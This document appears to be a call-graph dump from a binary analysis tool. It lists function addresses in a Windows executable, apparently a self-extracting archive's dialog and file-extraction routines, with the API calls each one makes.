28 API calls 28248->28252 28250 e74f50 28250->28242 28251->28244 28252->28250 28253 e85680 28254 e85696 _com_error::_com_error 28253->28254 28259 e8734a 28254->28259 28256 e856a4 28257 e84fce ___delayLoadHelper2@8 17 API calls 28256->28257 28258 e856bc 28257->28258 28260 e87391 RaiseException 28259->28260 28261 e87364 28259->28261 28260->28256 28261->28260 28262 e80900 28263 e8090f __EH_prolog3_catch_GS 28262->28263 28508 e61e44 28263->28508 28266 e8125b 28632 e83796 28266->28632 28267 e80940 28269 e8095f 28267->28269 28272 e80951 28267->28272 28274 e80a20 28267->28274 28693 e85796 28269->28693 28278 e8095a 28272->28278 28279 e809fc 28272->28279 28275 e80ab0 28274->28275 28280 e80a36 28274->28280 28518 e61ce2 28275->28518 28276 e8128a 28281 e812a3 GetDlgItem SendMessageW 28276->28281 28282 e81293 SendDlgItemMessageW 28276->28282 28277 e8127b SendMessageW 28277->28276 28278->28269 28287 e74318 53 API calls 28278->28287 28279->28269 28284 e80a15 EndDialog 28279->28284 28285 e74318 53 API calls 28280->28285 28651 e71309 28281->28651 28282->28281 28284->28269 28289 e80a53 SetDlgItemTextW 28285->28289 28291 e8098d 28287->28291 28294 e80a5f 28289->28294 28290 e812e3 GetDlgItem 28295 e81302 28290->28295 28688 e61900 29 API calls __ehhandler$___std_fs_change_permissions@12 28291->28688 28292 e80b01 GetDlgItem 28298 e80b38 SetFocus 28292->28298 28299 e80b15 SendMessageW SendMessageW 28292->28299 28293 e80af5 28309 e8113a 28293->28309 28415 e80acb EndDialog 28293->28415 28294->28269 28303 e80a68 GetMessageW 28294->28303 28660 e61e05 28295->28660 28304 e80b48 28298->28304 28305 e80b6f 28298->28305 28299->28298 28301 e80994 28307 e809a4 28301->28307 28689 e61de7 28301->28689 28302 e80ae4 28318 e61a66 26 API calls 28302->28318 28303->28269 28308 e80a7f IsDialogMessageW 28303->28308 28310 e74318 53 API calls 28304->28310 28714 e67673 28305->28714 28306 e8130c 28663 e7f2ce GetClassNameW 28306->28663 28307->28269 28692 e619a9 26 API calls 28307->28692 28308->28294 28315 e80a8e TranslateMessage DispatchMessageW 28308->28315 28316 e74318 53 API calls 28309->28316 28317 e80b52 28310->28317 28315->28294 28323 e8114b SetDlgItemTextW 28316->28323 28696 e614a7 28317->28696 28318->28269 28327 e81160 28323->28327 28326 e80b88 28331 e74318 53 API calls 28326->28331 28332 e74318 53 API calls 28327->28332 28330 e81346 28336 e81377 28330->28336 28339 e74318 53 API calls 28330->28339 28335 e80b9f 28331->28335 28337 e8117e 28332->28337 28333 e80b6a 28532 e61a66 28333->28532 28334 e81d4f 48 API calls 28334->28330 28719 e76a25 28335->28719 28346 e81d4f 48 API calls 28336->28346 28444 e81490 28336->28444 28341 e614a7 28 API calls 28337->28341 28345 e81359 SetDlgItemTextW 28339->28345 28342 e81187 28341->28342 28349 e811f5 28342->28349 28361 e614a7 28 API calls 28342->28361 28343 e81595 28356 e815ad 28343->28356 28357 e815a0 EnableWindow 28343->28357 28351 e74318 53 API calls 28345->28351 28352 e8138d 28346->28352 28348 e80be0 28355 e80c07 28348->28355 28723 e6ed0d 28348->28723 28354 e74318 53 API calls 28349->28354 28350 e83572 21 API calls 28358 e80bbb 28350->28358 28359 e8136d SetDlgItemTextW 28351->28359 28366 e813ad 28352->28366 28392 e813ce 28352->28392 28360 e811ff 28354->28360 28536 e6eaf3 28355->28536 28364 e815c8 28356->28364 28753 e61cc4 GetDlgItem KiUserCallbackDispatcher 28356->28753 28357->28356 28365 e61a66 26 API calls 28358->28365 28359->28336 28367 e614a7 28 API calls 28360->28367 28368 e811a6 28361->28368 28362 e8147c 28370 e81d4f 48 API calls 28362->28370 28374 e815f0 28364->28374 28383 e815e8 SendMessageW 28364->28383 28365->28333 28750 e7e265 34 API calls __EH_prolog3_GS 28366->28750 28381 e8120b 28367->28381 28376 e74318 53 API calls 28368->28376 28370->28444 28373 e81560 28752 e7e265 34 API calls __EH_prolog3_GS 28373->28752 28374->28302 28384 e74318 53 API calls 28374->28384 28410 e811b6 28376->28410 28378 e80c20 GetLastError 28379 e80c2b 28378->28379 28546 e72226 28379->28546 28395 e614a7 28 API calls 28381->28395 28382 e815bf 28754 e61cc4 GetDlgItem KiUserCallbackDispatcher 28382->28754 28383->28374 28390 e81609 SetDlgItemTextW 28384->28390 28385 e80c01 28726 e7fa79 25 API calls __ehhandler$___std_fs_change_permissions@12 28385->28726 28389 e614a7 28 API calls 28389->28444 28390->28302 28392->28362 28396 e81d4f 48 API calls 28392->28396 28393 e80c40 28397 e80c4c GetLastError 28393->28397 28398 e80c5d 28393->28398 28394 e81587 28399 e61a66 26 API calls 28394->28399 28400 e81224 28395->28400 28402 e81405 28396->28402 28397->28398 28403 e80cfd 28398->28403 28405 e80d0f 28398->28405 28408 e80c79 GetTickCount 28398->28408 28404 e81593 28399->28404 28413 e61a66 26 API calls 28400->28413 28401 e74318 53 API calls 28401->28444 28402->28362 28407 e8140e DialogBoxParamW 28402->28407 28403->28405 28406 e81046 28403->28406 28404->28343 28409 e80f94 28405->28409 28727 e713f9 28405->28727 28581 e61e1f GetDlgItem ShowWindow 28406->28581 28407->28362 28411 e8142c EndDialog 28407->28411 28549 e6325c 28408->28549 28409->28415 28748 e69733 28 API calls _wcslen 28409->28748 28418 e61a66 26 API calls 28410->28418 28411->28269 28419 e81448 28411->28419 28421 e81243 28413->28421 28415->28302 28425 e811e9 28418->28425 28419->28269 28751 e619a9 26 API calls 28419->28751 28427 e61a66 26 API calls 28421->28427 28422 e8105b 28582 e61e1f GetDlgItem ShowWindow 28422->28582 28423 e80fae 28440 e74318 53 API calls 28423->28440 28424 e80d39 28738 e7505a 114 API calls 28424->28738 28430 e61a66 26 API calls 28425->28430 28433 e8124e 28427->28433 28430->28349 28432 e80c9f 28437 e61a66 26 API calls 28432->28437 28438 e61a66 26 API calls 28433->28438 28434 e81064 28583 e74318 28434->28583 28436 e80d51 28447 e76a25 53 API calls 28436->28447 28441 e80cab 28437->28441 28438->28302 28443 e80fd4 28440->28443 28559 e6de9a 28441->28559 28453 e61a66 26 API calls 28443->28453 28444->28343 28444->28373 28444->28389 28444->28401 28446 e61a66 26 API calls 28444->28446 28445 e81082 SetDlgItemTextW GetDlgItem 28448 e8109f GetWindowLongW SetWindowLongW 28445->28448 28449 e810b7 28445->28449 28446->28444 28461 e80d80 GetCommandLineW 28447->28461 28448->28449 28588 e81d4f 28449->28588 28457 e80fea 28453->28457 28454 e80cd5 GetLastError 28455 e80ce0 28454->28455 28572 e6ddc7 28455->28572 28460 e61a66 26 API calls 28457->28460 28459 e81d4f 48 API calls 28464 e810ce 28459->28464 28465 e80ff6 28460->28465 28469 e80e05 _wcslen 28461->28469 28618 e83c78 28464->28618 28474 e74318 53 API calls 28465->28474 28467 e61a66 26 API calls 28467->28403 28739 e80405 5 API calls 2 library calls 28469->28739 28470 e80e23 28740 e80405 5 API calls 2 library calls 28470->28740 28473 e81d4f 48 API calls 28484 e810ef 28473->28484 28476 e8100c 28474->28476 28475 e80e2f 28741 e80405 5 API calls 2 library calls 28475->28741 28479 e614a7 28 API calls 28476->28479 28478 e81110 28749 e61cc4 GetDlgItem KiUserCallbackDispatcher 28478->28749 28482 e81015 28479->28482 28480 e80e3b 28742 e75109 114 API calls 28480->28742 28488 e61a66 26 API calls 28482->28488 28484->28478 28486 e81d4f 48 API calls 28484->28486 28485 e80e4e 28743 e83e53 28 API calls __EH_prolog3 28485->28743 28486->28478 28490 e81031 28488->28490 28489 e80e6b CreateFileMappingW 28491 e80e9d MapViewOfFile 28489->28491 28492 e80ed5 ShellExecuteExW 28489->28492 28493 e61a66 26 API calls 28490->28493 28494 e80ed2 __InternalCxxFrameHandler 28491->28494 28495 e80ef3 28492->28495 28493->28415 28494->28492 28496 e80f3d 28495->28496 28497 e80f00 WaitForInputIdle 28495->28497 28500 e80f60 UnmapViewOfFile CloseHandle 28496->28500 28501 e80f73 28496->28501 28498 e80f1e 28497->28498 28498->28496 28499 e80f23 Sleep 28498->28499 28499->28496 28499->28498 28500->28501 28744 e62e8b 28501->28744 28504 e61a66 26 API calls 28505 e80f83 28504->28505 28506 e61a66 26 API calls 28505->28506 28507 e80f8e 28506->28507 28507->28409 28509 e61ea6 28508->28509 28510 e61e4d 28508->28510 28756 e73e83 GetWindowLongW SetWindowLongW 28509->28756 28511 e61eb3 28510->28511 28755 e73eaa 64 API calls 3 library calls 28510->28755 28511->28266 28511->28267 28511->28269 28514 e61e6f 28514->28511 28515 e61e82 GetDlgItem 28514->28515 28515->28511 28516 e61e92 28515->28516 28516->28511 28517 e61e98 SetWindowTextW 28516->28517 28517->28511 28757 e857d8 28518->28757 28520 e61cee GetDlgItem 28521 e61d1d 28520->28521 28522 e61d0b 28520->28522 28758 e61d64 28521->28758 28523 e614a7 28 API calls 28522->28523 28525 e61d18 28523->28525 28526 e61d4d 28525->28526 28527 e61a66 26 API calls 28525->28527 28528 e61d5a 28526->28528 28529 e61a66 26 API calls 28526->28529 28527->28526 28769 e85787 28528->28769 28529->28528 28533 e61a80 28532->28533 28534 e61a71 28532->28534 28533->28348 28722 e83d64 26 API calls __EH_prolog3_GS 28533->28722 28535 e612a7 26 API calls 28534->28535 28535->28533 28538 e6eaff __EH_prolog3_GS 28536->28538 28537 e6eb09 28539 e85787 5 API calls 28537->28539 28538->28537 28541 e6eb84 28538->28541 28545 e61a66 26 API calls 28538->28545 28787 e6769f 28538->28787 28794 e6efef 28538->28794 28540 e6ebb6 28539->28540 28540->28378 28540->28379 28541->28537 28542 e6efef 54 API calls 28541->28542 28542->28537 28545->28538 28547 e72232 SetCurrentDirectoryW 28546->28547 28548 e72230 28546->28548 28547->28393 28548->28547 28550 e63280 28549->28550 28950 e62f0f 28550->28950 28553 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28554 e6329d 28553->28554 28555 e62f45 28554->28555 28556 e62f55 _wcslen 28555->28556 28954 e65962 28556->28954 28558 e62f63 28558->28432 28561 e6dea6 __EH_prolog3_GS 28559->28561 28560 e6def4 28563 e6df9e 28560->28563 28564 e7169a 47 API calls 28560->28564 28561->28560 28562 e6df09 CreateFileW 28561->28562 28562->28560 28566 e85787 5 API calls 28563->28566 28565 e6df49 28564->28565 28568 e6df56 28565->28568 28569 e6df59 CreateFileW 28565->28569 28570 e6df6e 28565->28570 28567 e6dfdf 28566->28567 28567->28454 28567->28455 28568->28569 28569->28570 28570->28563 28963 e619a9 26 API calls 28570->28963 28573 e6ddf8 28572->28573 28580 e6de09 28572->28580 28576 e6de04 28573->28576 28577 e6de0b 28573->28577 28573->28580 28574 e61a66 26 API calls 28575 e6de18 28574->28575 28575->28467 28964 e6dfe2 28576->28964 28969 e6de50 28577->28969 28580->28574 28581->28422 28582->28434 28584 e74328 28583->28584 28990 e74349 28584->28990 28587 e61e1f GetDlgItem ShowWindow 28587->28445 28604 e81d5e __EH_prolog3_GS 28588->28604 28590 e8349a 28591 e61a66 26 API calls 28590->28591 28592 e834a5 28591->28592 28593 e85787 5 API calls 28592->28593 28594 e810c5 28593->28594 28594->28459 28595 e6769f 45 API calls 28595->28604 28596 e625a4 26 API calls 28596->28604 28598 e614a7 28 API calls 28598->28604 28599 e7645a 28 API calls 28599->28604 28602 e834ad 29022 e658cb 45 API calls 28602->29022 28604->28590 28604->28595 28604->28596 28604->28598 28604->28599 28604->28602 28606 e61a66 26 API calls 28604->28606 29017 e762cd 30 API calls 2 library calls 28604->29017 29018 e7f5b2 28 API calls 28604->29018 29019 e6adaa CompareStringW 28604->29019 29020 e844c0 26 API calls 28604->29020 29021 e8030a 28 API calls 28604->29021 28606->28604 28619 e83c87 __EH_prolog3_catch_GS _wcslen 28618->28619 29023 e76a89 28619->29023 28621 e83cba 29027 e67903 28621->29027 28630 e85796 5 API calls 28631 e810e0 28630->28631 28631->28473 29923 e7eaa6 28632->29923 28635 e83885 28637 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28635->28637 28636 e837bf GetWindow 28636->28635 28644 e837d8 28636->28644 28638 e81266 28637->28638 28638->28276 28638->28277 28639 e837e5 GetClassNameW 29928 e78da4 CompareStringW 28639->29928 28641 e83809 GetWindowLongW 28642 e8386d GetWindow 28641->28642 28643 e83819 SendMessageW 28641->28643 28642->28635 28642->28644 28643->28642 28645 e8382f GetObjectW 28643->28645 28644->28635 28644->28639 28644->28641 28644->28642 29929 e7eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28645->29929 28647 e83846 29930 e7eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28647->29930 29931 e7ef21 13 API calls __ehhandler$___std_fs_change_permissions@12 28647->29931 28650 e83857 SendMessageW DeleteObject 28650->28642 29934 e857a5 28651->29934 28653 e71315 GetCurrentDirectoryW 28654 e71327 28653->28654 28657 e71323 28653->28657 29935 e61bbd 28 API calls 28654->29935 28656 e71339 GetCurrentDirectoryW 28658 e71356 _wcslen 28656->28658 28657->28290 28658->28657 28659 e612a7 26 API calls 28658->28659 28659->28657 28661 e61e11 SetWindowTextW 28660->28661 28662 e61e0f 28660->28662 28661->28306 28662->28661 28664 e7f2f9 28663->28664 28671 e7f31e 28663->28671 29936 e78da4 CompareStringW 28664->29936 28666 e7f323 SHAutoComplete 28667 e7f32c 28666->28667 28669 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28667->28669 28668 e7f30c 28670 e7f310 FindWindowExW 28668->28670 28668->28671 28672 e7f337 28669->28672 28670->28671 28671->28666 28671->28667 28673 e7fdd1 28672->28673 28674 e7fded 28673->28674 28675 e620b0 30 API calls 28674->28675 28676 e7fe27 28675->28676 29937 e62dbb 28676->29937 28679 e7fe43 28681 e6232c 123 API calls 28679->28681 28680 e7fe4c 29944 e6278b 28680->29944 28683 e7fe48 28681->28683 28686 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28683->28686 28685 e6232c 123 API calls 28685->28683 28687 e7fe77 28686->28687 28687->28330 28687->28334 28688->28301 28690 e61df3 SetDlgItemTextW 28689->28690 28691 e61df1 28689->28691 28690->28307 28691->28690 28692->28269 28694 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28693->28694 28695 e857a0 28694->28695 28695->28695 28697 e614bd _wcslen 28696->28697 28698 e6120c 28 API calls 28697->28698 28699 e614ca 28698->28699 28700 e83572 28699->28700 30028 e80678 PeekMessageW 28700->30028 28703 e835ac 28707 e835b7 ShowWindow SendMessageW SendMessageW 28703->28707 28704 e835e4 SendMessageW SendMessageW 28705 e83643 SendMessageW 28704->28705 28706 e83624 28704->28706 28708 e8365b 28705->28708 28709 e8365d SendMessageW SendMessageW 28705->28709 28706->28705 28707->28704 28708->28709 28710 e8367f SendMessageW 28709->28710 28711 e836a2 SendMessageW 28709->28711 28710->28711 28712 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28711->28712 28713 e836c0 28712->28713 28713->28333 28715 e6768c 28714->28715 30033 e67430 28715->30033 28717 e67699 28718 e834eb 28 API calls __EH_prolog3_GS 28717->28718 28718->28326 30044 e768d4 28719->30044 28722->28348 28724 e6ed1f 49 API calls 28723->28724 28725 e6ed16 28724->28725 28725->28355 28725->28385 28726->28355 28728 e71405 __EH_prolog3 28727->28728 28729 e856f6 28 API calls 28728->28729 28732 e7140f 28729->28732 28730 e71431 GetModuleFileNameW 28731 e71463 28730->28731 28730->28732 28734 e614a7 28 API calls 28731->28734 28732->28730 28732->28731 28733 e61be3 28 API calls 28732->28733 28733->28732 28735 e7146c 28734->28735 28736 e7147f 28735->28736 28737 e612a7 26 API calls 28735->28737 28736->28424 28737->28736 28738->28436 28739->28470 28740->28475 28741->28480 28742->28485 28743->28489 28745 e62e93 28744->28745 28746 e62ea0 28744->28746 28747 e612a7 26 API calls 28745->28747 28746->28504 28747->28746 28748->28423 28749->28293 28750->28392 28751->28362 28752->28394 28753->28382 28754->28364 28755->28514 28756->28511 28757->28520 28772 e857d8 28758->28772 28760 e61d70 GetWindowTextLengthW 28773 e61bbd 28 API calls 28760->28773 28762 e61dab GetWindowTextW 28763 e614a7 28 API calls 28762->28763 28764 e61dca 28763->28764 28765 e61ddd 28764->28765 28774 e612a7 28764->28774 28766 e85787 5 API calls 28765->28766 28768 e61de4 28766->28768 28768->28525 28779 e85734 28769->28779 28771 e61d61 28771->28292 28771->28293 28771->28415 28772->28760 28773->28762 28775 e612c1 28774->28775 28776 e612b4 28774->28776 28775->28765 28778 e619a9 26 API calls 28776->28778 28778->28775 28780 e8573c 28779->28780 28781 e8573d IsProcessorFeaturePresent 28779->28781 28780->28771 28783 e85bfc 28781->28783 28786 e85bbf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28783->28786 28785 e85cdf 28785->28771 28786->28785 28788 e676e1 28787->28788 28789 e676bb 28787->28789 28822 e658cb 45 API calls 28788->28822 28813 e6120c 28789->28813 28793 e676db 28793->28538 28797 e6effb __EH_prolog3_GS 28794->28797 28795 e6f02f 28798 e6ed0d 49 API calls 28795->28798 28796 e6f01b CreateDirectoryW 28796->28795 28799 e6f0d0 28796->28799 28797->28795 28797->28796 28800 e6f03b 28798->28800 28801 e6f0df 28799->28801 28866 e6f58b 28799->28866 28802 e6f0e3 GetLastError 28800->28802 28879 e7169a 28800->28879 28805 e85787 5 API calls 28801->28805 28802->28801 28807 e6f100 28805->28807 28807->28538 28808 e6f07d 28812 e6f0ad 28808->28812 28936 e619a9 26 API calls 28808->28936 28809 e6f073 CreateDirectoryW 28809->28808 28810 e6f070 28810->28809 28812->28799 28812->28802 28814 e6127d 28813->28814 28818 e6121d 28813->28818 28830 e61a92 28 API calls 28814->28830 28816 e61228 28816->28793 28818->28816 28823 e612d3 28 API calls Concurrency::cancel_current_task 28818->28823 28820 e61254 28824 e611b8 28820->28824 28823->28820 28825 e611c3 28824->28825 28826 e611cb 28824->28826 28845 e611dd 28825->28845 28829 e611c9 28826->28829 28831 e856f6 28826->28831 28829->28816 28833 e856fb 28831->28833 28834 e85715 28833->28834 28836 e85717 28833->28836 28854 e8d08c 28833->28854 28861 e8e91a 7 API calls 2 library calls 28833->28861 28834->28829 28837 e61a25 Concurrency::cancel_current_task 28836->28837 28839 e85721 28836->28839 28838 e8734a Concurrency::cancel_current_task RaiseException 28837->28838 28842 e61a41 28838->28842 28840 e8734a Concurrency::cancel_current_task RaiseException 28839->28840 28841 e86628 28840->28841 28843 e612a7 26 API calls 28842->28843 28844 e61a5a 28842->28844 28843->28844 28844->28829 28846 e61206 28845->28846 28847 e611e8 28845->28847 28865 e61a25 27 API calls Concurrency::cancel_current_task 28846->28865 28848 e856f6 28 API calls 28847->28848 28852 e611ee 28848->28852 28850 e6120b 28851 e611f5 28851->28829 28852->28851 28864 e8ac9e 26 API calls ___std_exception_copy 28852->28864 28859 e9040e __dosmaperr 28854->28859 28855 e9044c 28863 e901d3 20 API calls __dosmaperr 28855->28863 28856 e90437 RtlAllocateHeap 28858 e9044a 28856->28858 28856->28859 28858->28833 28859->28855 28859->28856 28862 e8e91a 7 API calls 2 library calls 28859->28862 28861->28833 28862->28859 28863->28858 28865->28850 28867 e6f597 __EH_prolog3_GS 28866->28867 28868 e6f5a4 SetFileAttributesW 28867->28868 28869 e6f5b7 28868->28869 28877 e6f622 28868->28877 28870 e7169a 47 API calls 28869->28870 28872 e6f5d7 28870->28872 28871 e85787 5 API calls 28873 e6f638 28871->28873 28874 e6f5f6 28872->28874 28875 e6f5e7 SetFileAttributesW 28872->28875 28876 e6f5e4 28872->28876 28873->28801 28874->28877 28937 e619a9 26 API calls 28874->28937 28875->28874 28876->28875 28877->28871 28880 e716e7 28879->28880 28894 e716e0 28879->28894 28881 e614a7 28 API calls 28880->28881 28884 e716f4 28881->28884 28882 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28883 e6f063 28882->28883 28883->28808 28883->28809 28883->28810 28885 e71711 28884->28885 28886 e717db 28884->28886 28888 e7171b 28885->28888 28895 e71741 28885->28895 28887 e71309 30 API calls 28886->28887 28893 e717fb 28887->28893 28938 e70ba6 28 API calls 28888->28938 28889 e718ed 28900 e71739 28889->28900 28949 e619a9 26 API calls 28889->28949 28891 e61a66 26 API calls 28891->28894 28892 e71729 28939 e625a4 28892->28939 28893->28889 28898 e71875 28893->28898 28899 e7181f 28893->28899 28894->28882 28895->28900 28906 e6769f 45 API calls 28895->28906 28947 e70ba6 28 API calls 28898->28947 28945 e70c41 28 API calls 28899->28945 28900->28891 28901 e71731 28903 e61a66 26 API calls 28901->28903 28903->28900 28904 e71883 28907 e625a4 26 API calls 28904->28907 28909 e71789 28906->28909 28910 e7188c 28907->28910 28908 e71838 28946 e61188 28 API calls 28908->28946 28943 e70bf3 28 API calls _wcslen 28909->28943 28913 e61a66 26 API calls 28910->28913 28916 e71894 28913->28916 28914 e71848 28921 e625a4 26 API calls 28914->28921 28915 e7179e 28944 e6aef3 28 API calls 28915->28944 28948 e70ddb 28 API calls 28916->28948 28919 e717b2 28920 e625a4 26 API calls 28919->28920 28922 e717be 28920->28922 28923 e71860 28921->28923 28924 e61a66 26 API calls 28922->28924 28925 e61a66 26 API calls 28923->28925 28927 e717c6 28924->28927 28929 e71868 28925->28929 28926 e6769f 45 API calls 28933 e71870 28926->28933 28930 e61a66 26 API calls 28927->28930 28928 e7189c 28928->28926 28931 e61a66 26 API calls 28929->28931 28932 e717ce 28930->28932 28931->28933 28934 e61a66 26 API calls 28932->28934 28935 e61a66 26 API calls 28933->28935 28934->28900 28935->28889 28936->28812 28937->28877 28938->28892 28940 e625b2 28939->28940 28941 e625ad 28939->28941 28940->28901 28942 e61a66 26 API calls 28941->28942 28942->28940 28943->28915 28944->28919 28945->28908 28946->28914 28947->28904 28948->28928 28949->28900 28951 e62f26 28950->28951 28952 e62f2f 28950->28952 28951->28553 28953 e6120c 28 API calls 28952->28953 28953->28951 28955 e65975 28954->28955 28956 e65a3a 28954->28956 28957 e65987 28955->28957 28961 e63029 28 API calls 28955->28961 28962 e658cb 45 API calls 28956->28962 28957->28558 28961->28957 28963->28563 28965 e6e015 28964->28965 28966 e6dfeb 28964->28966 28965->28580 28966->28965 28975 e6ec63 28966->28975 28971 e6de76 28969->28971 28972 e6de5c 28969->28972 28970 e6de95 28970->28580 28971->28970 28989 e6925b 109 API calls 28971->28989 28972->28971 28973 e6de68 CloseHandle 28972->28973 28973->28971 28976 e6ec6f __EH_prolog3_GS 28975->28976 28977 e6ec7c DeleteFileW 28976->28977 28978 e6ec8c 28977->28978 28986 e6ecf4 28977->28986 28979 e7169a 47 API calls 28978->28979 28982 e6ecac 28979->28982 28980 e85787 5 API calls 28981 e6e013 28980->28981 28981->28580 28983 e6ecbc DeleteFileW 28982->28983 28984 e6ecb9 28982->28984 28985 e6ecc8 28982->28985 28983->28985 28984->28983 28985->28986 28988 e619a9 26 API calls 28985->28988 28986->28980 28988->28986 28989->28970 28996 e7347b 28990->28996 28993 e74346 SetDlgItemTextW 28993->28587 28994 e7436c LoadStringW 28994->28993 28995 e74383 LoadStringW 28994->28995 28995->28993 29003 e7338e 28996->29003 28999 e734bc 29001 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 28999->29001 29002 e734d1 29001->29002 29002->28993 29002->28994 29004 e733c2 29003->29004 29012 e73445 _strncpy 29003->29012 29008 e733e2 29004->29008 29014 e789ed WideCharToMultiByte 29004->29014 29006 e85734 __ehhandler$___std_fs_change_permissions@12 5 API calls 29007 e73474 29006->29007 29007->28999 29013 e734d5 26 API calls 29007->29013 29011 e73413 29008->29011 29015 e742b2 50 API calls __vsnprintf 29008->29015 29016 e8d097 26 API calls 3 library calls 29011->29016 29012->29006 29013->28999 29014->29008 29015->29011 29016->29012 29017->28604 29018->28604 29019->28604 29020->28604 29021->28604 29024 e76a99 _wcslen 29023->29024 29078 e61be3 29024->29078 29026 e76abb 29026->28621 29028 e76a74 29027->29028 29029 e76a89 28 API calls 29028->29029 29030 e76a86 29029->29030 29031 e6b03d 29030->29031 29032 e6b049 __EH_prolog3_GS 29031->29032 29083 e72815 29032->29083 29034 e6b092 29093 e6b231 29034->29093 29037 e61a66 26 API calls 29038 e6b120 29037->29038 29039 e61a66 26 API calls 29038->29039 29040 e6b128 29039->29040 29041 e856f6 28 API calls 29040->29041 29042 e6b13f 29041->29042 29098 e7a599 29042->29098 29044 e6b172 29045 e85787 5 API calls 29044->29045 29046 e6b179 29045->29046 29047 e6b3e1 29046->29047 29048 e6b3ed __EH_prolog3_GS 29047->29048 29049 e6b478 29048->29049 29052 e6b484 29048->29052 29152 e6f711 29048->29152 29050 e61a66 26 API calls 29049->29050 29050->29052 29057 e6b4e0 29052->29057 29119 e6bc65 29052->29119 29053 e6b529 29054 e85787 5 API calls 29053->29054 29056 e6b543 29054->29056 29059 e6b194 29056->29059 29057->29053 29159 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29057->29159 29867 e6d6bc 29059->29867 29063 e61a66 26 API calls 29065 e6b1e8 29063->29065 29064 e6b1d0 29064->29063 29066 e61a66 26 API calls 29065->29066 29067 e6b1f3 29066->29067 29068 e61a66 26 API calls 29067->29068 29069 e6b1fe 29068->29069 29881 e728aa 29069->29881 29071 e6b206 29072 e61a66 26 API calls 29071->29072 29073 e6b20e 29072->29073 29074 e61a66 26 API calls 29073->29074 29075 e6b216 29074->29075 29076 e6d869 26 API calls 29075->29076 29077 e6b21d 29076->29077 29077->28630 29079 e61c03 29078->29079 29080 e61bfb 29078->29080 29079->29080 29082 e61c33 28 API calls 29079->29082 29080->29026 29082->29080 29084 e72821 __EH_prolog3 29083->29084 29085 e856f6 28 API calls 29084->29085 29086 e7285f 29085->29086 29087 e72872 29086->29087 29104 e680ec 29086->29104 29089 e856f6 28 API calls 29087->29089 29090 e72883 29089->29090 29091 e680ec 28 API calls 29090->29091 29092 e72896 29090->29092 29091->29092 29092->29034 29094 e625a4 26 API calls 29093->29094 29095 e6b23f 29094->29095 29096 e625a4 26 API calls 29095->29096 29097 e6b118 29096->29097 29097->29037 29099 e7a5a5 __EH_prolog3 29098->29099 29100 e856f6 28 API calls 29099->29100 29101 e7a5bf 29100->29101 29102 e7a5d6 29101->29102 29118 e77445 112 API calls 29101->29118 29102->29044 29105 e680f8 __EH_prolog3 29104->29105 29110 e85b4b 29105->29110 29107 e68111 29108 e85b4b 28 API calls 29107->29108 29109 e68133 __cftof 29108->29109 29109->29087 29111 e85b57 __FrameHandler3::FrameUnwindToState 29110->29111 29112 e85b82 29111->29112 29114 e68180 29111->29114 29112->29107 29115 e6818c __EH_prolog3 29114->29115 29116 e74f2b 28 API calls 29115->29116 29117 e68196 29116->29117 29117->29111 29118->29102 29120 e6bc80 29119->29120 29160 e620b0 29120->29160 29122 e6bca7 29123 e6bcba 29122->29123 29384 e6e910 29122->29384 29128 e6bcec 29123->29128 29172 e627e0 29123->29172 29126 e6bce8 29126->29128 29196 e62d41 160 API calls __EH_prolog3_GS 29126->29196 29361 e6232c 29128->29361 29133 e6bd14 29134 e6be08 29133->29134 29135 e67673 28 API calls 29133->29135 29197 e6bec2 7 API calls 29134->29197 29137 e6bd36 29135->29137 29388 e71e54 46 API calls 2 library calls 29137->29388 29139 e6f711 53 API calls 29148 e6bd53 29139->29148 29140 e6be76 29140->29128 29201 e652d8 29140->29201 29213 e6bf3d 29140->29213 29141 e6be16 29141->29140 29198 e7864f 29141->29198 29143 e6bde8 29146 e61a66 26 API calls 29143->29146 29145 e61a66 26 API calls 29145->29148 29149 e6bded 29146->29149 29148->29139 29148->29143 29148->29145 29389 e71e54 46 API calls 2 library calls 29148->29389 29150 e61a66 26 API calls 29149->29150 29150->29134 29153 e71a9f 5 API calls 29152->29153 29154 e6f723 29153->29154 29155 e6f74b 29154->29155 29825 e6f826 29154->29825 29155->29048 29158 e6f738 FindClose 29158->29155 29159->29053 29161 e620bc __EH_prolog3 29160->29161 29162 e680ec 28 API calls 29161->29162 29163 e620d9 29162->29163 29164 e72815 28 API calls 29163->29164 29165 e620e8 29164->29165 29166 e62193 29165->29166 29167 e856f6 28 API calls 29165->29167 29390 e7026f 29166->29390 29169 e62180 29167->29169 29169->29166 29170 e676e7 30 API calls 29169->29170 29170->29166 29171 e62227 __cftof 29171->29122 29173 e627ec __EH_prolog3 29172->29173 29174 e611dd 28 API calls 29173->29174 29181 e62838 29173->29181 29193 e6298b 29173->29193 29179 e62882 29174->29179 29175 e629a9 29410 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29175->29410 29177 e652d8 133 API calls 29183 e629f4 29177->29183 29178 e629b6 29178->29177 29178->29193 29401 e6e850 29179->29401 29180 e62a3c 29185 e62a6f 29180->29185 29180->29193 29411 e6204b 89 API calls __ehhandler$___std_fs_change_permissions@12 29180->29411 29181->29175 29181->29178 29183->29180 29184 e652d8 133 API calls 29183->29184 29184->29183 29185->29193 29194 e6e850 111 API calls 29185->29194 29186 e62986 29189 e62e8b 26 API calls 29186->29189 29187 e62995 29188 e62e8b 26 API calls 29187->29188 29188->29181 29189->29193 29190 e628ad 29190->29186 29190->29187 29191 e652d8 133 API calls 29192 e62ac0 29191->29192 29192->29191 29192->29193 29193->29126 29194->29192 29196->29133 29197->29141 29414 e84300 29198->29414 29202 e652e4 29201->29202 29203 e652e8 29201->29203 29202->29140 29212 e6e850 111 API calls 29203->29212 29204 e652fa 29205 e65315 29204->29205 29206 e65323 29204->29206 29207 e65355 29205->29207 29444 e648aa 118 API calls 2 library calls 29205->29444 29445 e63d9d 131 API calls 3 library calls 29206->29445 29207->29140 29210 e65321 29210->29207 29446 e6344b 89 API calls 29210->29446 29212->29204 29214 e6bf95 29213->29214 29219 e6bfc4 29214->29219 29226 e6c2fd 29214->29226 29546 